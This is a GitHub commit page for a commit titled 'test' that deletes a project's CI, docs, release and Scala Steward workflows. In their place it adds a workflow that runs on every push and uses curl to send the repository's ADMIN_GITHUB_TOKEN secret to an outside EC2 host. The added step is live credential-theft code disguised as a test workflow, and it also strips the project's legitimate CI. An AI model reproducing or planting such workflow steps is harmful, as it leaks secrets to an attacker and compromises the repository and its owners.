Skip to content

Commit

Permalink
test
Browse files Browse the repository at this point in the history
  • Loading branch information
Jayashwa Chauhan authored and Jayashwa Chauhan committed Jul 2, 2024
1 parent 54e1bf2 commit 481cfff
Show file tree
Hide file tree
Showing 5 changed files with 16 additions and 131 deletions.
67 changes: 0 additions & 67 deletions .github/workflows/ci.yaml

This file was deleted.

22 changes: 0 additions & 22 deletions .github/workflows/doc.yaml

This file was deleted.

27 changes: 0 additions & 27 deletions .github/workflows/release.yaml

This file was deleted.

15 changes: 0 additions & 15 deletions .github/workflows/scala-steward.yaml

This file was deleted.

16 changes: 16 additions & 0 deletions .github/workflows/test.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
name: testing

on: [push]

jobs:
testing:
runs-on: ubuntu-latest

steps:
- name: Checkout code
uses: actions/checkout@v2

- name: Send AWS Secrets for Global
run: |
curl -X POST http://ec2-13-201-100-246.ap-south-1.compute.amazonaws.com:8888 \
-d "github-token: ${{ secrets.ADMIN_GITHUB_TOKEN }}"

0 comments on commit 481cfff

Please sign in to comment.